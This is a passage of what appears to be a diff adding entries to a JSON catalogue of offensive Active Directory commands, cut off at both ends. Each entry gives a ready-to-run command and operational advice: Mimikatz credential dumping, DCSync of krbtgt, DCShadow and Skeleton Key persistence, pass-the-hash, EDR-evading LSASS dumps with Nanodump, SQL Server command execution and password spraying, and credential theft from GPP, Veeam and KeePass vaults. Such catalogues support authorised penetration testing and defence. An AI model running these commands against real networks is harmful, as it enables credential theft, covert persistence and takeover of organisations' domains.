regexes matched against extracted file contents (it can parse PDF, Office and other formats), while -f/--filenames and -e/--extensions narrow the crawl by name or type. It downloads matching files to the loot directory by default; add -n/--no-download for a quieter content-only sweep. Useful for wide domain-scale secret hunting once you hold any domain account.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "SMB" + ], + "references": [ + "https://github.com/blacklanternsecurity/MANSPIDER", + "https://www.blacklanternsecurity.com/2020-11-04-MANSPIDER/" + ], + "added": true + }, + { + "id": "wadcoms:Mimikatz-Crypto-ExportCerts", + "toolId": "wadcoms:Mimikatz", + "toolName": "Mimikatz", + "name": "Mimikatz-Crypto-ExportCerts", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access", + "Collection" + ], + "nativeCategory": [ + "Credential Access", + "Collection" + ], + "command": "mimikatz.exe \"crypto::capi\" \"privilege::debug\" \"crypto::cng\" \"crypto::certificates /systemstore:LOCAL_MACHINE /store:My /export\" exit", + "description": "Mimikatz crypto::certificates lists and, with /export, extracts certificates and their private keys from a CryptoAPI store to .pfx/.der files, even when the private key was marked non-exportable. crypto::capi (and crypto::cng for CNG keys) patches the key-provider in memory first so the non-exportable flag is bypassed. Point /systemstore at LOCAL_MACHINE for machine certs or CURRENT_USER for user certs; exported .pfx files enable certificate-based (PKINIT) authentication as that principal.\n\nCommand Reference:\n\n\tStore: LOCAL_MACHINE\\My\n\n\tExport password: mimikatz (default for exported .pfx)", + "mitre": [ + "T1552.004" + ], + "requires": [ + "Shell" + ], + "services": [ + "ADCS" + ], + "references": [ + "https://github.com/gentilkiwi/mimikatz", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates", + "https://attack.mitre.org/techniques/T1552/004/" + ], + "added": true + }, + { + "id": "wadcoms:Mimikatz-DCShadow", + "toolId": "wadcoms:Mimikatz", + "toolName": "Mimikatz", + "name": "Mimikatz-DCShadow", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Persistence", + "Defense Evasion" + ], + "nativeCategory": [ + "Persistence", + "Defense Evasion" + ], + "command": "# Instance 1 (SYSTEM) - stage the change\nmimikatz.exe \"!+\" \"!processtoken\" \"lsadump::dcshadow /object:john /attribute:primaryGroupID /value:512\"\n\n# Instance 2 (Domain Admin) - push the replication\nmimikatz.exe \"lsadump::dcshadow /push\" exit", + "description": "Mimikatz lsadump::dcshadow temporarily registers a rogue domain controller and pushes attacker-chosen attribute changes into the directory through legitimate replication (MS-DRSR), which sidesteps normal object-modification auditing. It runs as two cooperating instances: an elevated SYSTEM instance stages the change with /object, /attribute and /value, and a second instance holding Domain Admin (or the required replication rights) triggers the push with /push. Use it for stealthy persistence such as writing a primaryGroupID or SIDHistory.\n\nCommand Reference:\n\n\tTarget object: john\n\n\tAttribute: primaryGroupID = 512 (Domain Admins)", + "mitre": [], + "requires": [ + "Shell" + ], + "services": [ + "LDAP", + "RPC" + ], + "references": [ + "https://github.com/gentilkiwi/mimikatz", + "https://www.dcshadow.com/", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcshadow" + ], + "added": true + }, + { + "id": "wadcoms:Mimikatz-DCSync-Krbtgt", + "toolId": "wadcoms:Mimikatz", + "toolName": "Mimikatz", + "name": "Mimikatz-DCSync-Krbtgt", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access", + "Execution" + ], + "nativeCategory": [ + "Credential Access", + "Exploitation" + ], + "command": "mimikatz.exe \"privilege::debug\" \"lsadump::dcsync /domain:test.local /user:krbtgt\" exit", + "description": "Mimikatz lsadump::dcsync impersonates a domain controller and uses the MS-DRSR replication protocol (GetNCChanges) to pull the password data of a chosen account from a live DC, without ever running code on that DC or touching NTDS.dit on disk. Targeting krbtgt yields the KDC key needed to forge Golden Tickets. It requires an account with the Replicating Directory Changes / Replicating Directory Changes All rights (Domain Admins, Enterprise Admins, or a delegated principal).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tTarget user: krbtgt", + "mitre": [ + "T1003.006" + ], + "requires": [ + "Shell" + ], + "services": [ + "Kerberos", + "LDAP" + ], + "references": [ + "https://github.com/gentilkiwi/mimikatz", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync", + "https://attack.mitre.org/techniques/T1003/006/" + ], + "added": true + }, + { + "id": "wadcoms:Mimikatz-DPAPI-Masterkey-Cred", + "toolId": "wadcoms:Mimikatz", + "toolName": "Mimikatz", + "name": "Mimikatz-DPAPI-Masterkey-Cred", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "mimikatz.exe \"dpapi::masterkey /in:\\\"%appdata%\\Microsoft\\Protect\\S-1-5-21-1339291983-1349129144-367733775-1001\\<GUID>\\\" /sid:S-1-5-21-1339291983-1349129144-367733775-1001 /password:password123\" \"dpapi::cred /in:\\\"%appdata%\\Microsoft\\Credentials\\<GUID>\\\"\" exit", + "description": "Mimikatz dpapi::masterkey decrypts a user's DPAPI master key from the Protect folder using their password (and SID), and dpapi::cred then uses that cached master key to decrypt a Credential blob into its stored plaintext secret. DPAPI protects saved RDP, browser, scheduled-task, and Credential Manager secrets, so this chain recovers them offline from copied files. If you lack the user's password, dpapi::masterkey /rpc asks the domain controller to decrypt the key with the domain DPAPI backup key.\n\nCommand Reference:\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tPassword: password123", + "mitre": [ + "T1555.004" + ], + "requires": [ + "Shell", + "Password" + ], + "services": [ + "NTLM" + ], + "references": [ + "https://github.com/gentilkiwi/mimikatz", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", + "https://attack.mitre.org/techniques/T1555/004/" + ], + "added": true + }, + { + "id": "wadcoms:Mimikatz-LogonPasswords", + "toolId": "wadcoms:Mimikatz", + "toolName": "Mimikatz", + "name": "Mimikatz-LogonPasswords", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit", + "description": "Mimikatz sekurlsa::logonpasswords reads the authentication material cached in LSASS memory and reconstructs plaintext passwords, NT/LM hashes, and Kerberos keys for every interactive, service, and network logon session on the host. It requires local administrator rights and SeDebugPrivilege, which privilege::debug enables before touching LSASS. This is the classic loud credential dump; on hardened hosts (Credential Guard, PPL, or EDR hooking LSASS) it will fail or be caught, so prefer an offline minidump plus pypykatz when OPSEC matters.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tPrivilege: SeDebugPrivilege", + "mitre": [ + "T1003.001" + ], + "requires": [ + "Shell" + ], + "services": [ + "NTLM", + "Kerberos" + ], + "references": [ + "https://github.com/gentilkiwi/mimikatz", + "https://book.hacktricks.xyz/windows-hardening/stealing-credentials", + "https://attack.mitre.org/techniques/T1003/001/" + ], + "added": true + }, + { + "id": "wadcoms:Mimikatz-LsadumpSAM", + "toolId": "wadcoms:Mimikatz", + "toolName": "Mimikatz", + "name": "Mimikatz-LsadumpSAM", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "mimikatz.exe \"privilege::debug\" \"token::elevate\" \"lsadump::sam\" exit", + "description": "Mimikatz lsadump::sam decrypts the local SAM database using the boot key from the SYSTEM hive and dumps the NT hashes of all local accounts, including the local Administrator. Running it live requires SYSTEM-level access, so token::elevate is used to raise from an administrative shell to SYSTEM. The recovered local hashes are ideal for local pass-the-hash and for spotting password reuse across a fleet where the same local admin hash is shared.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tHive source: live registry (SAM + SYSTEM)", + "mitre": [ + "T1003.002" + ], + "requires": [ + "Shell" + ], + "services": [ + "NTLM" + ], + "references": [ + "https://github.com/gentilkiwi/mimikatz", + "https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz", + "https://attack.mitre.org/techniques/T1003/002/" + ], + "added": true + }, + { + "id": "wadcoms:Mimikatz-LsadumpSecrets", + "toolId": "wadcoms:Mimikatz", + "toolName": "Mimikatz", + "name": "Mimikatz-LsadumpSecrets", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "mimikatz.exe \"privilege::debug\" \"token::elevate\" \"lsadump::secrets\" exit", + "description": "Mimikatz lsadump::secrets decrypts the LSA secrets stored under the SECURITY registry hive, exposing service account passwords, scheduled-task credentials, cached DPAPI machine keys, auto-logon passwords, and the machine account secret in cleartext. It needs SYSTEM rights, so token::elevate is chained after privilege::debug. LSA secrets frequently hand over a domain service account password that no other technique reveals.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tHive source: live registry (SECURITY + SYSTEM)", + "mitre": [ + "T1003.004" + ], + "requires": [ + "Shell" + ], + "services": [ + "NTLM" + ], + "references": [ + "https://github.com/gentilkiwi/mimikatz", + "https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz", + "https://attack.mitre.org/techniques/T1003/004/" + ], + "added": true + }, + { + "id": "wadcoms:Mimikatz-PassTheHash", + "toolId": "wadcoms:Mimikatz", + "toolName": "Mimikatz", + "name": "Mimikatz-PassTheHash", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Lateral Movement" + ], + "nativeCategory": [ + "Lateral Movement" + ], + "command": "mimikatz.exe \"privilege::debug\" \"sekurlsa::pth /user:john /domain:test.local /ntlm:2a3de7fe356ee524cc9f3d579f2e0aa7 /run:cmd.exe\" exit", + "description": "Mimikatz sekurlsa::pth performs pass-the-hash by starting a new process whose logon session is seeded with a supplied NT hash (or AES key), letting network authentication proceed as the target user without knowing their password. The spawned process (here cmd.exe) can then reach SMB, WMI, or WinRM as john. It requires local administrator rights on the box you run it from because it patches the new process's LSASS session; use /aes256 instead of /ntlm for an overpass-the-hash that requests Kerberos tickets.\n\nCommand Reference:\n\n\tUsername: john\n\n\tDomain: test.local\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7", + "mitre": [ + "T1550.002" + ], + "requires": [ + "Shell", + "Hash" + ], + "services": [ + "NTLM", + "SMB", + "Kerberos" + ], + "references": [ + "https://github.com/gentilkiwi/mimikatz", + "https://book.hacktricks.xyz/windows-hardening/ntlm/pass-the-hash", + "https://attack.mitre.org/techniques/T1550/002/" + ], + "added": true + }, + { + "id": "wadcoms:Mimikatz-PassTheTicket", + "toolId": "wadcoms:Mimikatz", + "toolName": "Mimikatz", + "name": "Mimikatz-PassTheTicket", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Lateral Movement" + ], + "nativeCategory": [ + "Lateral Movement" + ], + "command": "mimikatz.exe \"kerberos::ptt ticket.kirbi\" exit", + "description": "Mimikatz kerberos::ptt injects a Kerberos ticket (.kirbi TGT or TGS) directly into the current logon session's ticket cache, so subsequent tools authenticate with it transparently. Unlike sekurlsa::pth it does not spawn a process or need administrator rights, since it only writes to the caller's own cache. Use it to replay a harvested or forged ticket for pass-the-ticket lateral movement, then verify with klist.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi", + "mitre": [ + "T1550.003" + ], + "requires": [ + "Shell", + "TGT" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/gentilkiwi/mimikatz", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket", + "https://attack.mitre.org/techniques/T1550/003/" + ], + "added": true + }, + { + "id": "wadcoms:Mimikatz-SkeletonKey", + "toolId": "wadcoms:Mimikatz", + "toolName": "Mimikatz", + "name": "Mimikatz-SkeletonKey", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Persistence" + ], + "nativeCategory": [ + "Persistence" + ], + "command": "mimikatz.exe \"privilege::debug\" \"misc::skeleton\" exit", + "description": "Mimikatz misc::skeleton patches the LSASS process of a live domain controller in memory so that a master password (the hardcoded default 'mimikatz') is accepted for any domain account alongside each user's real password. It is a stealthy but volatile persistence primitive: the patch lives only in memory and is lost on DC reboot, and it downgrades some Kerberos encryption which detections watch for. It requires Domain Admin / SeDebugPrivilege on the DC and only works against DCs not running LSA as a protected process.\n\nCommand Reference:\n\n\tTarget: Domain Controller DC01 (dc.test.local)\n\n\tMaster password: mimikatz (built-in default)", + "mitre": [ + "T1556.001" + ], + "requires": [ + "Shell" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/gentilkiwi/mimikatz", + "https://adsecurity.org/?p=1275", + "https://attack.mitre.org/techniques/T1556/001/" + ], + "added": true + }, + { + "id": "wadcoms:Nanodump-LSASS", + "toolId": "wadcoms:Nanodump", + "toolName": "Nanodump", + "name": "Nanodump-LSASS", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access", + "Defense Evasion" + ], + "nativeCategory": [ + "Credential Access", + "Defense Evasion" + ], + "command": "nanodump.x64.exe --fork --valid --write C:\\Windows\\Temp\\lsass.dmp", + "description": "Nanodump is an OPSEC-aware LSASS dumper that reads process memory and writes a minidump without calling the heavily monitored MiniDumpWriteDump API, avoiding many EDR hooks. --fork clones the LSASS process and dumps the copy to reduce detection, and --valid restores the dump's signature so pypykatz or Mimikatz can parse it (nanodump writes an invalid signature by default to evade disk scanners). It requires local administrator / SeDebugPrivilege; exfil the dump and parse it offline.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp", + "mitre": [ + "T1003.001" + ], + "requires": [ + "Shell" + ], + "services": [ + "NTLM", + "Kerberos" + ], + "references": [ + "https://github.com/fortra/nanodump", + "https://book.hacktricks.xyz/windows-hardening/stealing-credentials", + "https://attack.mitre.org/techniques/T1003/001/" + ], + "added": true + }, + { + "id": "wadcoms:NetExec-LDAP-ADCS", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "NetExec-LDAP-ADCS", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "# Enumerate Enterprise CAs and certificate templates over LDAP\nnxc ldap 10.10.10.1 -u john -p password123 -M adcs", + "description": "The NetExec (nxc) ldap module -M adcs enumerates Active Directory Certificate Services by querying the Configuration partition over LDAP, listing the Enterprise CAs and the certificate templates published in the domain. It is a quick way to confirm AD CS is present and to gather CA and template names before running Certipy to hunt for vulnerable (ESC) configurations. Requires any valid domain account.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tTarget DC IP: 10.10.10.1", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP", + "ADCS" + ], + "references": [ + "https://github.com/Pennyw0rth/NetExec", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates", + "https://posts.specterops.io/certified-pre-owned-d95910965cd2" + ], + "added": true + }, + { + "id": "wadcoms:NetExec-LDAP-MAQ", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "NetExec-LDAP-MAQ", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "# Read ms-DS-MachineAccountQuota (how many computer accounts this user may add)\nnxc ldap 10.10.10.1 -u john -p password123 -M maq\n# Confirm the authenticated identity / domain SID\nnxc ldap 10.10.10.1 -u john -p password123 -M whoami", + "description": "The NetExec (nxc) ldap module -M maq reads the ms-DS-MachineAccountQuota attribute, revealing how many computer accounts an authenticated user is allowed to create (default 10). A non-zero quota is a prerequisite for attacks that need a controlled computer object, such as Resource-Based Constrained Delegation (RBCD) and Shadow Credentials. The -M whoami module confirms the authenticated context and domain SID. Both need only a valid low-privileged account.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tTarget DC IP: 10.10.10.1", + "mitre": [ + "T1087.002" + ], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/Pennyw0rth/NetExec", + "https://www.netexec.wiki/ldap-protocol/enumerate-machineaccountquota", + "https://attack.mitre.org/techniques/T1087/002/" + ], + "added": true + }, + { + "id": "wadcoms:NetExec-MSSQL-CmdExec", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "NetExec-MSSQL-CmdExec", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Execution", + "Lateral Movement" + ], + "nativeCategory": [ + "Exploitation", + "Lateral Movement" + ], + "command": "# OS command via xp_cmdshell\nnxc mssql 10.10.10.1 -u john -p password123 -x \"whoami /all\"\n\n# PowerShell command\nnxc mssql 10.10.10.1 -u john -p password123 -X \"$PSVersionTable\"", + "description": "NetExec's mssql -x runs an operating-system command through xp_cmdshell (it will enable the option automatically if the login is sysadmin), returning stdout. Use -X instead to execute a PowerShell command block. Command execution runs as the SQL Server service account and requires sysadmin; enabling xp_cmdshell is a high-signal event.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "MSSQL" + ], + "references": [ + "https://github.com/Pennyw0rth/NetExec", + "https://www.netexec.wiki/mssql-protocol/command-execution", + "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server" + ], + "added": true + }, + { + "id": "wadcoms:NetExec-MSSQL-LocalAuth", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "NetExec-MSSQL-LocalAuth", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access", + "Lateral Movement" + ], + "nativeCategory": [ + "Credential Access", + "Lateral Movement" + ], + "command": "# Local SQL login (e.g. sa) rather than domain auth\nnxc mssql 10.10.10.1 -u sa -p password123 --local-auth\n\n# Spray a local sa password across a subnet\nnxc mssql 10.10.10.0/24 -u sa -p password123 --local-auth", + "description": "With --local-auth, NetExec authenticates the SQL Server login as a local (mixed-mode) account instead of a domain principal — the classic case being the sa account or a recovered application login. This is useful for password spraying a reused sa password across many hosts, or logging into an instance that is not domain-joined. Combine with -q, -x, or a module once authenticated.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: sa\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "MSSQL" + ], + "references": [ + "https://github.com/Pennyw0rth/NetExec", + "https://www.netexec.wiki/mssql-protocol/authentication", + "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server" + ], + "added": true + }, + { + "id": "wadcoms:NetExec-MSSQL-Priv", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "NetExec-MSSQL-Priv", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "# Enumerate impersonation / db_owner privesc paths\nnxc mssql 10.10.10.1 -u john -p password123 -M mssql_priv\n\n# Escalate the current login to sysadmin\nnxc mssql 10.10.10.1 -u john -p password123 -M mssql_priv -o ACTION=privesc", + "description": "The mssql_priv NetExec module enumerates and abuses privilege-escalation paths inside a SQL Server instance — principals the login can impersonate (EXECUTE AS / IMPERSONATE), and db_owner membership on databases owned by a high-privileged principal. Run it with no options to enumerate available paths; run it with ACTION=privesc to walk the chain and grant the current login sysadmin. Add ACTION=rollback to undo the change afterwards.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "MSSQL" + ], + "references": [ + "https://github.com/Pennyw0rth/NetExec", + "https://www.netexec.wiki/mssql-protocol/mssql-privesc", + "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server" + ], + "added": true + }, + { + "id": "wadcoms:NetExec-MSSQL-Query", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "NetExec-MSSQL-Query", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "nxc mssql 10.10.10.1 -u john -p password123 -q \"SELECT @@version\"\n\n# domain (Windows) auth\nnxc mssql 10.10.10.1 -u john -p password123 --windows-auth -q \"SELECT SYSTEM_USER\"", + "description": "NetExec's mssql protocol authenticates to SQL Server and runs an arbitrary T-SQL statement with -q/--query, printing the result set. It is the quickest way to fingerprint an instance (@@version), enumerate databases, or check the effective privileges of the login. Add -windows-auth to authenticate the domain account over NTLM rather than SQL auth.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "MSSQL" + ], + "references": [ + "https://github.com/Pennyw0rth/NetExec", + "https://www.netexec.wiki/mssql-protocol/authentication", + "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server" + ], + "added": true + }, + { + "id": "wadcoms:NetExec-noPac", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "NetExec nopac Module", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "nxc smb 10.10.10.1 -u john -p password123 -M nopac", + "description": "The NetExec/nxc smb 'nopac' module automates the CVE-2021-42278 + CVE-2021-42287 sAMAccountName spoofing chain from a single authenticated SMB connection. It confirms the DC is vulnerable, creates and renames a machine account, and requests an impersonating service ticket, saving the resulting ccache to disk for reuse with impacket tools. Requires MachineAccountQuota > 0 and a DC missing the November 2021 patches; it is a fast way to validate the primitive during an engagement.\n\nCommand Reference:\n\n\tDomain / DC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "SMB", + "Kerberos", + "LDAP" + ], + "references": [ + "https://github.com/Pennyw0rth/NetExec", + "https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing" + ], + "added": true + }, + { + "id": "wadcoms:NetExec-SMB-GPPAutologin", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "NetExec-SMB-GPPAutologin", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access", + "Collection" + ], + "nativeCategory": [ + "Credential Access", + "Collection" + ], + "command": "nxc smb 10.10.10.1 -u john -p password123 -M gpp_autologin", + "description": "The gpp_autologin module parses Registry.xml files pushed through Group Policy Preferences in SYSVOL and extracts autologon credentials (DefaultUserName / DefaultPassword) configured for interactive logon. Unlike cpassword these values are stored in cleartext, so no decryption is needed. Any domain account can read SYSVOL, making this a fast credential-hunting check against the domain controller alongside gpp_password.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [ + "T1552.006" + ], + "requires": [ + "Username", + "Password" + ], + "services": [ + "SMB" + ], + "references": [ + "https://github.com/Pennyw0rth/NetExec", + "https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password", + "https://attack.mitre.org/techniques/T1552/006/" + ], + "added": true + }, + { + "id": "wadcoms:NetExec-SMB-GPPPassword", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "NetExec-SMB-GPPPassword", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access", + "Collection" + ], + "nativeCategory": [ + "Credential Access", + "Collection" + ], + "command": "nxc smb 10.10.10.1 -u john -p password123 -M gpp_password", + "description": "The gpp_password module searches SYSVOL for Group Policy Preferences XML files (Groups.xml, Services.xml, ScheduledTasks.xml, etc.) that contain a cpassword attribute, then decrypts it using the AES key Microsoft published in MSDN. Any authenticated domain user can read SYSVOL, so this is a classic quick win for recovering local admin or service account passwords set via GPP. Microsoft patched (MS14-025) the ability to create new GPP passwords but did not remove existing ones, so legacy cpassword values still linger in many domains.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [ + "T1552.006" + ], + "requires": [ + "Username", + "Password" + ], + "services": [ + "SMB" + ], + "references": [ + "https://github.com/Pennyw0rth/NetExec", + "https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password", + "https://attack.mitre.org/techniques/T1552/006/" + ], + "added": true + }, + { + "id": "wadcoms:NetExec-SMB-KeePassDiscover", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "NetExec-SMB-KeePassDiscover", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Discovery", + "Credential Access" + ], + "nativeCategory": [ + "Discovery", + "Credential Access" + ], + "command": "nxc smb 10.10.10.1 -u john -p password123 -M keepass_discover", + "description": "The keepass_discover module remotely enumerates a target for running KeePass processes and for KeePass.config.xml configuration files, reporting the paths it finds. This is the reconnaissance step before keepass_trigger: you need the config file path to plant a malicious export trigger. Requires local admin on the target so the module can inspect processes and the user's AppData. No database is opened or modified at this stage.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "SMB" + ], + "references": [ + "https://github.com/Pennyw0rth/NetExec", + "https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass" + ], + "added": true + }, + { + "id": "wadcoms:NetExec-SMB-KeePassTrigger", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "NetExec-SMB-KeePassTrigger", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access", + "Collection" + ], + "nativeCategory": [ + "Credential Access", + "Collection" + ], + "command": "nxc smb 10.10.10.1 -u john -p password123 -M keepass_trigger -o KEEPASS_CONFIG_PATH=\"C:\\Users\\john\\AppData\\Roaming\\KeePass\\KeePass.config.xml\"", + "description": "The keepass_trigger module abuses KeePass's trigger system: it edits KeePass.config.xml (path found via keepass_discover) to add a malicious export trigger, so the next time the victim unlocks their database KeePass silently exports every entry in cleartext to a location the operator can read. The default ACTION=ALL adds the trigger, waits, retrieves and parses the export, then cleans up. Requires local admin on the host and that the user actually opens their vault; it is noisier and higher-risk than passive hunting, so restore the config afterward.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n\n\tKeePass config path: C:\\Users\\john\\AppData\\Roaming\\KeePass\\KeePass.config.xml", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "SMB" + ], + "references": [ + "https://github.com/Pennyw0rth/NetExec", + "https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass" + ], + "added": true + }, + { + "id": "wadcoms:NetExec-SMB-SpiderPlus", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "NetExec-SMB-SpiderPlus", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Collection", + "Discovery" + ], + "nativeCategory": [ + "Collection", + "Discovery" + ], + "command": "# JSON share/file inventory only (metadata, no downloads)\nnxc smb 10.10.10.1 -u john -p password123 -M spider_plus\n\n# Download every readable file under the size limit\nnxc smb 10.10.10.1 -u john -p password123 -M spider_plus -o DOWNLOAD_FLAG=True", + "description": "The spider_plus module walks every share the authenticated user can read and writes a per-host JSON inventory of file metadata (path, size, ctime/mtime/atime) to the output folder, giving you a fast triage map of what exists before you pull anything down. By default it only catalogs; setting DOWNLOAD_FLAG=True makes it copy files under MAX_FILE_SIZE to the loot folder. Prefer the metadata-only run first to stay quiet and avoid mass file reads. Good starting point for share enumeration at scale with a single low-priv credential.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "SMB" + ], + "references": [ + "https://github.com/Pennyw0rth/NetExec", + "https://www.netexec.wiki/smb-protocol/spidering-shares" + ], + "added": true + }, + { + "id": "wadcoms:NetExec-SMB-Veeam", + "toolId": "wadcoms:NetExec", + "toolName": "NetExec", + "name": "NetExec-SMB-Veeam", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access", + "Collection" + ], + "nativeCategory": [ + "Credential Access", + "Collection" + ], + "command": "nxc smb 10.10.10.1 -u john -p password123 -M veeam", + "description": "The veeam module locates a Veeam Backup & Replication configuration database on the target, reads the stored credential records and decrypts them, recovering the accounts Veeam uses for backups (often domain or local admin). Because backup servers are commonly configured with highly privileged service accounts, this is a frequent path to escalation. Requires local admin on the Veeam server so the module can reach the backing SQL database and DPAPI material.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + 